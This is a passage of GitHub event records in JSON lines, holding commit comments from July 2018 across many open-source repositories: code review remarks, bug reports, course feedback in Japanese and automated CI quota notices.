{"id":"7937808386","type":"CommitCommentEvent","actor":{"login":"MusaTalluzi"},"repo":{"name":"kiegroup/optaplanner"},"payload":{"comment":{"id":29642157,"position":7,"line":106,"path":"optaplanner-examples/src/main/java/org/optaplanner/examples/common/persistence/AbstractXlsxSolutionFileIO.java","commit_id":"3d679ef07fdb4e56aafa0601a380a49c99a990c2","created_at":"2018-07-09T13:57:59Z","updated_at":"2018-07-09T13:57:59Z","author_association":"CONTRIBUTOR","body":"@ge0ffrey I'm using the KIE style code mentioned [here](https://github.com/kiegroup/droolsjbpm-build-bootstrap/blob/master/README.md#configuring-intellij). Should the documentation be updated to include this wrapping style?"}},"created_at":"2018-07-09T13:57:59Z"}
{"id":"7937814363","type":"CommitCommentEvent","actor":{"login":"DNx5"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29642171,"position":null,"line":null,"path":null,"commit_id":"6a219c3fc492307a293175d38cf1554d60c52b7c","created_at":"2018-07-09T13:58:57Z","updated_at":"2018-07-09T13:58:57Z","author_association":"MEMBER","body":"just to make sure join verification not get called twice"}},"created_at":"2018-07-09T13:58:57Z"}
{"id":"7937814872","type":"CommitCommentEvent","actor":{"login":"KangOl"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29642172,"position":null,"line":null,"path":null,"commit_id":"b87a95b6d6b846b660506a3f4ef3472ebc4df809","created_at":"2018-07-09T13:59:02Z","updated_at":"2018-07-09T13:59:02Z","author_association":"CONTRIBUTOR","body":"😄 "}},"created_at":"2018-07-09T13:59:02Z"}
{"id":"7937821314","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29642184,"position":null,"line":null,"path":null,"commit_id":"e1bb33d070ac38b52b54bbe9d005ac8d18093df7","created_at":"2018-07-09T14:00:05Z","updated_at":"2018-07-09T14:00:05Z","author_association":"NONE","body":"再提出ありがとうございます。さらにいい感じのコードになっていますね。\r\nいっこだけ言うと、yakitori_sはこのコードだと「割引率」というより「割り引いたあとの率」になっていて、厳密にはコメントとコードが一致していないように見えます。\r\n模範解答については、講義の際に見せる事にしますね。"}},"created_at":"2018-07-09T14:00:05Z"}
{"id":"7937821547","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29642186,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T14:00:09Z","updated_at":"2018-07-09T14:00:09Z","author_association":"MEMBER","body":"@mutoe 我推荐你如果时间稍微富余的话，你可以尝试使用 JSX 写 vue，如果觉得太难，可以从简单组建写起，有助于你学习 React ，其实如果你用熟悉了 JSX 语法糖，写 React 只是一些钩子和生命周期的区别而已了。"}},"created_at":"2018-07-09T14:00:09Z"}
{"id":"7937832848","type":"CommitCommentEvent","actor":{"login":"stafot"},"repo":{"name":"awslabs/logstash-output-amazon_es"},"payload":{"comment":{"id":29642214,"position":null,"line":null,"path":null,"commit_id":"2244fd79ef6098bb06a7c80dc8a44031d37b6cd5","created_at":"2018-07-09T14:01:54Z","updated_at":"2018-07-09T14:01:54Z","author_association":"NONE","body":"@xyq164202 Thanks for this update."}},"created_at":"2018-07-09T14:01:54Z"}
{"id":"7937833801","type":"CommitCommentEvent","actor":{"login":"neuchangqingwei"},"repo":{"name":"neuchangqingwei/CT"},"payload":{"comment":{"id":29642217,"position":null,"line":null,"path":null,"commit_id":"1baa87fab795d069242dae235a5b83fa74e857af","created_at":"2018-07-09T14:02:04Z","updated_at":"2018-07-09T14:02:04Z","author_association":"OWNER","body":"fbp.m"}},"created_at":"2018-07-09T14:02:04Z"}
{"id":"7937836656","type":"CommitCommentEvent","actor":{"login":"v-a-d-e-r"},"repo":{"name":"letscontrolit/ESPEasy"},"payload":{"comment":{"id":29642227,"position":null,"line":null,"path":null,"commit_id":"c4803b41369d057493acddc08e0a9afc02e325f5","created_at":"2018-07-09T14:02:32Z","updated_at":"2018-07-09T14:02:32Z","author_association":"NONE","body":"Values in the task device table are not updating any more!? Java problem?"}},"created_at":"2018-07-09T14:02:32Z"}
{"id":"7937841457","type":"CommitCommentEvent","actor":{"login":"Rioss"},"repo":{"name":"clips/pattern"},"payload":{"comment":{"id":29642235,"position":null,"line":null,"path":null,"commit_id":"ac0011bc921e8d868c11f85851a03a03ef1cab3c","created_at":"2018-07-09T14:03:18Z","updated_at":"2018-07-09T14:03:18Z","author_association":"NONE","body":"Hi, when i try to install pattern from PIP, this show me a error in line 40 \"print n\". I tried install using \"pip install pattern\" and \"pip3 install pattern\" whitout(\"\") and both show me the same error."}},"created_at":"2018-07-09T14:03:18Z"}
{"id":"7937847476","type":"CommitCommentEvent","actor":{"login":"LordVenom"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29642245,"position":null,"line":null,"path":null,"commit_id":"4bab31ee0ce461949b488b4cd2733b38849f6daf","created_at":"2018-07-09T14:04:17Z","updated_at":"2018-07-09T14:04:17Z","author_association":"COLLABORATOR","body":"Inclus dans la 0.6.4"}},"created_at":"2018-07-09T14:04:17Z"}
{"id":"7937851268","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642251,"position":20,"line":422,"path":"addons/web/static/src/js/views/abstract_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:04:54Z","updated_at":"2018-07-09T14:04:54Z","author_association":"NONE","body":"var reloadOnClose = ..."}},"created_at":"2018-07-09T14:04:54Z"}
{"id":"7937854652","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29642256,"position":null,"line":null,"path":null,"commit_id":"5f3cb6509b400f2ffcff39cf1030efc84a64c256","created_at":"2018-07-09T14:05:26Z","updated_at":"2018-07-09T14:05:26Z","author_association":"NONE","body":"計算の過程が分かりやすく、すごく見やすいコードになっていますね。OKです。\r\nひとつだけ出題の意図に沿っていないところを挙げると、割引率そのものを変数に持っていない(1から引いた結果を変数に格納している)部分でしょうか。計算結果的には問題なしです。"}},"created_at":"2018-07-09T14:05:26Z"}
{"id":"7937857676","type":"CommitCommentEvent","actor":{"login":"boxshadow"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29642262,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T14:05:55Z","updated_at":"2018-07-09T14:05:55Z","author_association":"MEMBER","body":"邮箱提示都爆了 我的两位哥"}},"created_at":"2018-07-09T14:05:55Z"}
{"id":"7937858300","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29642263,"position":null,"line":null,"path":null,"commit_id":"dfc37d340797e3c2c9ee8f4fef15de8db74221a3","created_at":"2018-07-09T14:06:01Z","updated_at":"2018-07-09T14:06:01Z","author_association":"CONTRIBUTOR","body":"shouldn't this be an `update` instead of `write` ?"}},"created_at":"2018-07-09T14:06:01Z"}
{"id":"7937859638","type":"CommitCommentEvent","actor":{"login":"timogauweiler"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29642265,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T14:06:15Z","updated_at":"2018-07-09T14:06:15Z","author_association":"NONE","body":"I guess this was a mistake? Which icon should that be?"}},"created_at":"2018-07-09T14:06:15Z"}
{"id":"7937862221","type":"CommitCommentEvent","actor":{"login":"galibert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29642281,"position":null,"line":null,"path":null,"commit_id":"fe6851a2d5fa2d0ea7ad21d9969bae6698f32505","created_at":"2018-07-09T14:06:41Z","updated_at":"2018-07-09T14:06:41Z","author_association":"MEMBER","body":"Oh damn.  Didn't expect that.  Need to think about it... Is it pushing the\nfriggin' stack frame twice?\n\n  OG.\n\n\nOn Mon, Jul 9, 2018 at 3:30 PM, ajrhacker <notifications@github.com> wrote:\n\n> For wicat, the first problem is a MOVE.L instruction that hits invalid\n> memory twice because MAME's M68000 core isn't subcycle-interruptible.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/fe6851a2d5fa2d0ea7ad21d9969bae6698f32505#commitcomment-29641812>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI0i8YYjCpgpF6VM9giWynNQ5gQ_hpozks5uE1sBgaJpZM4VF3zs>\n> .\n>\n"}},"created_at":"2018-07-09T14:06:41Z"}
{"id":"7937862542","type":"CommitCommentEvent","actor":{"login":"markusbattarbee"},"repo":{"name":"ykempf/vlasiator"},"payload":{"comment":{"id":29642283,"position":null,"line":null,"path":null,"commit_id":"c3787532f14e046fc7857d216a08f4f32858b751","created_at":"2018-07-09T14:06:43Z","updated_at":"2018-07-09T14:06:43Z","author_association":"NONE","body":"The commit looks good to me. And yeah, this could be propagated to all projects - though it could even be wrapped in a helper function instead."}},"created_at":"2018-07-09T14:06:43Z"}
{"id":"7937866426","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29642296,"position":null,"line":null,"path":null,"commit_id":"56c8538483fd1ea7c2e4a01f8884d626547e08ab","created_at":"2018-07-09T14:07:21Z","updated_at":"2018-07-09T14:07:21Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nWhat do you mean?\r\nI think I could help, but I don't know what exactly you are confused about."}},"created_at":"2018-07-09T14:07:21Z"}
{"id":"7937867397","type":"CommitCommentEvent","actor":{"login":"v-stepanov"},"repo":{"name":"zalando/nakadi"},"payload":{"comment":{"id":29642298,"position":26,"line":178,"path":"src/main/java/org/zalando/nakadi/validation/JsonSchemaEnrichment.java","commit_id":"7ab73d2309358778495a30321d864422a1bc4a68","created_at":"2018-07-09T14:07:31Z","updated_at":"2018-07-09T14:07:31Z","author_association":"MEMBER","body":"done https://github.com/zalando/nakadi/pull/907/commits/393c9ddccf1a3fad4b27191ff0a2a48606ac6651"}},"created_at":"2018-07-09T14:07:31Z"}
{"id":"7937868444","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29642302,"position":null,"line":null,"path":null,"commit_id":"f56a094b3b3b82f2ea9e264d050c524937a01f5d","created_at":"2018-07-09T14:07:41Z","updated_at":"2018-07-09T14:07:41Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nWhat do you mean?\r\nI think I could help, but I don't know what exactly you are confused about."}},"created_at":"2018-07-09T14:07:41Z"}
{"id":"7937870043","type":"CommitCommentEvent","actor":{"login":"ngocloc2008"},"repo":{"name":"ngocloc2008/lol-dice"},"payload":{"comment":{"id":29642309,"position":2,"line":1,"path":"user","commit_id":"8fce3dc36f49b45c3ba69563c91e9399c9edb1f8","created_at":"2018-07-09T14:07:56Z","updated_at":"2018-07-09T14:07:56Z","author_association":"OWNER","body":"ad"}},"created_at":"2018-07-09T14:07:56Z"}
{"id":"7937871391","type":"CommitCommentEvent","actor":{"login":"JinTianWeiLai"},"repo":{"name":"JinTianWeiLai/Skill-for-Idea"},"payload":{"comment":{"id":29642320,"position":null,"line":null,"path":null,"commit_id":"bdb3e7348075e0ac431262bda57737eac13924b7","created_at":"2018-07-09T14:08:11Z","updated_at":"2018-07-09T14:08:11Z","author_association":"OWNER","body":"放些别处要引用的图片"}},"created_at":"2018-07-09T14:08:11Z"}
{"id":"7937872121","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"khalifagates/vlcqml2"},"payload":{"comment":{"id":29642325,"position":1,"line":1,"path":"modules/codec/webvtt/CSSGrammar.h","commit_id":"b6fcbb7166e5e66720c98eb845efc39c4bf004e8","created_at":"2018-07-09T14:08:18Z","updated_at":"2018-07-09T14:08:18Z","author_association":"CONTRIBUTOR","body":"I don't think you intended to commit theses files"}},"created_at":"2018-07-09T14:08:18Z"}
{"id":"7937875891","type":"CommitCommentEvent","actor":{"login":"soebbing"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29642343,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T14:08:55Z","updated_at":"2018-07-09T14:08:55Z","author_association":"CONTRIBUTOR","body":"A rocket maybe? http://www.decodeunicode.org/de/u+1F680"}},"created_at":"2018-07-09T14:08:55Z"}
{"id":"7937878131","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"yihui/tinytex"},"payload":{"comment":{"id":29642350,"position":null,"line":null,"path":null,"commit_id":"9aab573bd52e507dca5f8450ba1e2b78e8f7b5e4","created_at":"2018-07-09T14:09:17Z","updated_at":"2018-07-09T14:09:17Z","author_association":"OWNER","body":"Fixed via 4fce1b5ca83cbaffd5c34db73bc7dc7d2aec2a24. Thanks!"}},"created_at":"2018-07-09T14:09:17Z"}
{"id":"7937882585","type":"CommitCommentEvent","actor":{"login":"PaddyS"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29642371,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T14:10:01Z","updated_at":"2018-07-09T14:10:01Z","author_association":"CONTRIBUTOR","body":"https://www.utf8icons.com/character/59008/utf-8-character"}},"created_at":"2018-07-09T14:10:01Z"}
{"id":"7937885990","type":"CommitCommentEvent","actor":{"login":"straight-shoota"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29642380,"position":72,"line":220,"path":"src/http/server.cr","commit_id":"f042096a41f91b6c671b52d3f707ea794590f6c1","created_at":"2018-07-09T14:10:35Z","updated_at":"2018-07-09T14:10:35Z","author_association":"CONTRIBUTOR","body":"It's confusing at times... Template engines of the Django family (Jinja, Liquid, Crinja) have control structures similar to Crystal macros but with explicit scope names in the end tag (`{% endif %}` etc.)"}},"created_at":"2018-07-09T14:10:35Z"}
{"id":"7937890223","type":"CommitCommentEvent","actor":{"login":"mehedi47"},"repo":{"name":"mehedi47/C_Programming_code"},"payload":{"comment":{"id":29642391,"position":null,"line":null,"path":null,"commit_id":"acd19181ea97e278f905ce9e1af042f3dfc79ade","created_at":"2018-07-09T14:11:17Z","updated_at":"2018-07-09T14:11:17Z","author_association":"OWNER","body":"Program to print an array in reverse order"}},"created_at":"2018-07-09T14:11:17Z"}
{"id":"7937890989","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29642394,"position":null,"line":null,"path":null,"commit_id":"cda3d1568796afd9b9a0e3f248799791a86ce5dd","created_at":"2018-07-09T14:11:24Z","updated_at":"2018-07-09T14:11:24Z","author_association":"NONE","body":"修正ありがとうございます。\r\nポイントカードの値引き部分の変数はそのままで良かったかな^^;\r\nコメントと役割が一致していなかったことを指示しましたが、誤解を招いたみたいでした。すみません。\r\n\r\nネタ明かしすると、僕なら値引き部分、下記のようにします。\r\n\r\n# 割引いた結果の率\r\nyakitori_w = 0.2\r\n# 値引きするポイント\r\npoint_off = 150\r\n\r\npayment = (((beer_v * beer_c) + (otumami_v * otumami_c) + ((yakitori_v * (1 - yakitori_w)) * yakitori_c)) - point_off)\r\n\r\n参考までに。"}},"created_at":"2018-07-09T14:11:24Z"}
{"id":"7937893587","type":"CommitCommentEvent","actor":{"login":"thomasmari"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29642402,"position":null,"line":null,"path":null,"commit_id":"f56a094b3b3b82f2ea9e264d050c524937a01f5d","created_at":"2018-07-09T14:11:49Z","updated_at":"2018-07-09T14:11:49Z","author_association":"OWNER","body":"In the Oris model there is two different transition for the rejuvenation but in the fdprism model there is only 1 event for the rejuvenation."}},"created_at":"2018-07-09T14:11:49Z"}
{"id":"7937896833","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29642411,"position":null,"line":null,"path":null,"commit_id":"7163bf9323618728a548aaaf133a93581db541f6","created_at":"2018-07-09T14:12:20Z","updated_at":"2018-07-09T14:12:20Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/we-havent-seen-you-in-a-while-doesnt-actually-bring-you-to-top/72735/7\n"}},"created_at":"2018-07-09T14:12:20Z"}
{"id":"7937897134","type":"CommitCommentEvent","actor":{"login":"daveaglick"},"repo":{"name":"daveaglick/Buildalyzer"},"payload":{"comment":{"id":29642413,"position":154,"line":250,"path":"src/Buildalyzer/ProjectAnalyzer.cs","commit_id":"8e37263b14000adcaf875139c0ea7591e58df60a","created_at":"2018-07-09T14:12:23Z","updated_at":"2018-07-09T14:12:23Z","author_association":"OWNER","body":"@dfederm Thanks! I hadn’t seen that PR and it (and your explanation) does clarify things quite a bit. Think I’ve got this nailed down implementation-wise (I’m now running the Restore target in a seperate submission prior to other targets) so hopefully we’ll be good to go from the next version on."}},"created_at":"2018-07-09T14:12:23Z"}
{"id":"7937897586","type":"CommitCommentEvent","actor":{"login":"soebbing"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29642414,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T14:12:27Z","updated_at":"2018-07-09T14:12:27Z","author_association":"CONTRIBUTOR","body":"You can find it here: https://developers.shopware.com/styletile/components.html#icon-set"}},"created_at":"2018-07-09T14:12:27Z"}
{"id":"7937900109","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29642419,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-09T14:12:51Z","updated_at":"2018-07-09T14:12:51Z","author_association":"MEMBER","body":"I'd assume it's aligned then, and every other magic symbol here is either a `void*` or `size_t` too, so I don't see a good reason to introduce 32-bit ints and fixup the alignment later."}},"created_at":"2018-07-09T14:12:51Z"}
{"id":"7937904798","type":"CommitCommentEvent","actor":{"login":"DanaSelene"},"repo":{"name":"DanaSelene/website-videos"},"payload":{"comment":{"id":29642434,"position":29,"line":36,"path":"HOME Page","commit_id":"93deae9d37f6d2d1955934a89c13d376442b3558","created_at":"2018-07-09T14:13:38Z","updated_at":"2018-07-09T14:13:38Z","author_association":"OWNER","body":"this is my original code and it is NOT working out."}},"created_at":"2018-07-09T14:13:38Z"}
{"id":"7937906868","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29642437,"position":null,"line":null,"path":null,"commit_id":"12e386fad918215c49df783b704145a0014f130b","created_at":"2018-07-09T14:13:57Z","updated_at":"2018-07-09T14:13:57Z","author_association":"OWNER","body":"<img width=\"651\" alt=\"screen shot 2018-07-09 at 21 10 51\" src=\"https://user-images.githubusercontent.com/32533504/42455620-f8987146-83bc-11e8-9268-9608117ce817.png\">\r\n"}},"created_at":"2018-07-09T14:13:57Z"}
{"id":"7937907741","type":"CommitCommentEvent","actor":{"login":"eolienne"},"repo":{"name":"eolienne/migration-email"},"payload":{"comment":{"id":29642439,"position":null,"line":null,"path":null,"commit_id":"696b4c612fbdd72d931af81d5cff26e97aa0fb94","created_at":"2018-07-09T14:14:07Z","updated_at":"2018-07-09T14:14:07Z","author_association":"OWNER","body":"Updated column titles to align with new format."}},"created_at":"2018-07-09T14:14:07Z"}
{"id":"7937911032","type":"CommitCommentEvent","actor":{"login":"guiKailu"},"repo":{"name":"guiKailu/guiKailu.github.io"},"payload":{"comment":{"id":29642448,"position":null,"line":null,"path":null,"commit_id":"103a662379850fec3781a1953f04886a1fc514cb","created_at":"2018-07-09T14:14:38Z","updated_at":"2018-07-09T14:14:38Z","author_association":"OWNER","body":"The test was successful! The button tag implements border-radius settings better in mobile chrome and mobile safari than input with type submit. Previously, the button had rounded edges on all sides, ignoring the border radius of 0px 10px 10px 0px."}},"created_at":"2018-07-09T14:14:38Z"}
{"id":"7937911726","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29642449,"position":null,"line":null,"path":null,"commit_id":"cfdc7bd11c9b71a0ebeea97a03d781f1eb056ab2","created_at":"2018-07-09T14:14:45Z","updated_at":"2018-07-09T14:14:45Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6d0898d4-8382-11e8-97a8-1297af6e9f48`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T14:14:45Z"}
{"id":"7937911920","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29642451,"position":6,"line":6,"path":"samples/code/multi-project-builds/groovy-dsl/build.gradle","commit_id":"6965b08956613a19f108edbe215eb0fd3bb32abe","created_at":"2018-07-09T14:14:47Z","updated_at":"2018-07-09T14:14:47Z","author_association":"MEMBER","body":"The `plugins {}` block cannot be used when cross-configuring projects."}},"created_at":"2018-07-09T14:14:47Z"}
{"id":"7937916265","type":"CommitCommentEvent","actor":{"login":"ArjenMiedema"},"repo":{"name":"tig-nl/buckaroo-magento2"},"payload":{"comment":{"id":29642465,"position":null,"line":null,"path":null,"commit_id":"9b09b167add0be111bd6571b0cadc13d462b185c","created_at":"2018-07-09T14:15:29Z","updated_at":"2018-07-09T14:15:29Z","author_association":"NONE","body":"@tig-bartrusschenberg just an FYI, the `setup_version` in `etc/module.xml` should only be updated when you have database changes. Now the command `bin/magento setup:db:status` will always return that you need to update your database.\r\n\r\nIf you have deployments that rely on this (which is pretty common), your shop will be put in maintenance mode, while this is not required, because there are no actual changes to the database."}},"created_at":"2018-07-09T14:15:29Z"}
{"id":"7937922548","type":"CommitCommentEvent","actor":{"login":"MasseGuillaume"},"repo":{"name":"mosesn/util"},"payload":{"comment":{"id":29642490,"position":5,"line":143,"path":"util-core/src/main/scala/com/twitter/util/Config.scala","commit_id":"2e39765147dbfca3433271d83f139e64070fc0bd","created_at":"2018-07-09T14:16:29Z","updated_at":"2018-07-09T14:16:29Z","author_association":"NONE","body":"`.iterator`"}},"created_at":"2018-07-09T14:16:29Z"}
{"id":"7937924175","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29642494,"position":80,"line":792,"path":"contents/index.adoc","commit_id":"3849d13bc60cbe523d035fdf740a180ca2791a56","created_at":"2018-07-09T14:16:43Z","updated_at":"2018-07-09T14:16:43Z","author_association":"MEMBER","body":"It's not recommended using the Kotlin DSL.\r\nBut there are also hard to troubleshoot bugs that can affect Groovy builds.\r\nSee e.g. https://github.com/gradle/gradle/issues/4823"}},"created_at":"2018-07-09T14:16:43Z"}
{"id":"7937929650","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29642508,"position":391,"line":782,"path":"contents/index.adoc","commit_id":"f7786b7469341f99f9cd39aad43659d67d268d98","created_at":"2018-07-09T14:17:37Z","updated_at":"2018-07-09T14:17:37Z","author_association":"MEMBER","body":"Not from Kotlin (or Java) unfortunately"}},"created_at":"2018-07-09T14:17:37Z"}
{"id":"7937931122","type":"CommitCommentEvent","actor":{"login":"LukaszDygon"},"repo":{"name":"UKGovernmentBEIS/beis-mspsds"},"payload":{"comment":{"id":29642511,"position":null,"line":null,"path":null,"commit_id":"1eea7d992793ea74bcd50c6652ad1738528f57a8","created_at":"2018-07-09T14:17:51Z","updated_at":"2018-07-09T14:17:51Z","author_association":"NONE","body":"Rake task now creates the products once if they have a barcode ('gtin').\r\nThe investigation and actions are generated from the RAPEX reports.\r\nThe data_import:delete_rapex task deletes the content generated by the data_import:rapex task"}},"created_at":"2018-07-09T14:17:51Z"}
{"id":"7937934823","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642522,"position":20,"line":422,"path":"addons/web/static/src/js/views/abstract_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:18:27Z","updated_at":"2018-07-09T14:18:27Z","author_association":"NONE","body":"also, this variable should be defined in the if statement"}},"created_at":"2018-07-09T14:18:27Z"}
{"id":"7937936790","type":"CommitCommentEvent","actor":{"login":"MikeThomsen"},"repo":{"name":"MikeThomsen/nifi"},"payload":{"comment":{"id":29642532,"position":null,"line":null,"path":null,"commit_id":"2ed953a89b7d03fd8a12f10c903cc63b24615e56","created_at":"2018-07-09T14:18:47Z","updated_at":"2018-07-09T14:18:47Z","author_association":"OWNER","body":"@markap14 @mattyb149 could one of you review this? It's not a formal PR, but I'd like some input as to whether or not I'm headed down a bad path with this approach. It's related to that Mongo ticket for having two sessions for controlling committing."}},"created_at":"2018-07-09T14:18:47Z"}
{"id":"7937942541","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29642561,"position":null,"line":null,"path":null,"commit_id":"10dddcbab8dde6e19d11491987dfa618cdbca4aa","created_at":"2018-07-09T14:19:44Z","updated_at":"2018-07-09T14:19:44Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `1f0e9f60-8383-11e8-8429-ac0ff119db3f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T14:19:44Z"}
{"id":"7937950849","type":"CommitCommentEvent","actor":{"login":"qxpf666"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29642581,"position":null,"line":null,"path":null,"commit_id":"64052172f4044eb6d4320bd72fe7d23f30e3620f","created_at":"2018-07-09T14:21:05Z","updated_at":"2018-07-09T14:21:05Z","author_association":"NONE","body":"ERROR 1064 (42000) at line 34: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'INSERT IGNORE INTO `creature_addon` (`guid`, `emote`) VALUES (21011114, 1)' at line 4"}},"created_at":"2018-07-09T14:21:05Z"}
{"id":"7937958445","type":"CommitCommentEvent","actor":{"login":"theelk801"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":29642592,"position":null,"line":null,"path":null,"commit_id":"88eeaa3f1e81b0f56d0d5ff13da35563d6bef016","created_at":"2018-07-09T14:22:21Z","updated_at":"2018-07-09T14:22:21Z","author_association":"CONTRIBUTOR","body":"Yeah, I can fix that."}},"created_at":"2018-07-09T14:22:21Z"}
{"id":"7937960047","type":"CommitCommentEvent","actor":{"login":"bkuschel"},"repo":{"name":"bkuschel/ui-microservices-toolchain-20180509181745418"},"payload":{"comment":{"id":29642595,"position":null,"line":null,"path":null,"commit_id":"8b83d280e093db5c8633c748e2cf4d461184c2c6","created_at":"2018-07-09T14:22:36Z","updated_at":"2018-07-09T14:22:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d524007c-d828-4ee2-b058-9379cc119640?env_id=ibm%3Ayp%3Aus-south \"microservices-toolchain-20180509181745418\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bbd1b2b3-1fcc-4e9c-857a-6f1a441d40c2?env_id=ibm%3Ayp%3Aus-south \"ui-microservices-toolchain-20180509181745418\") deployed [ui-microservices-toolchain-20180509181745418](https://github.com/bkuschel/ui-microservices-toolchain-20180509181745418/releases/tag/deploy-STAGING-20180709-142235 \"deploy-STAGING-20180709-142235\") to 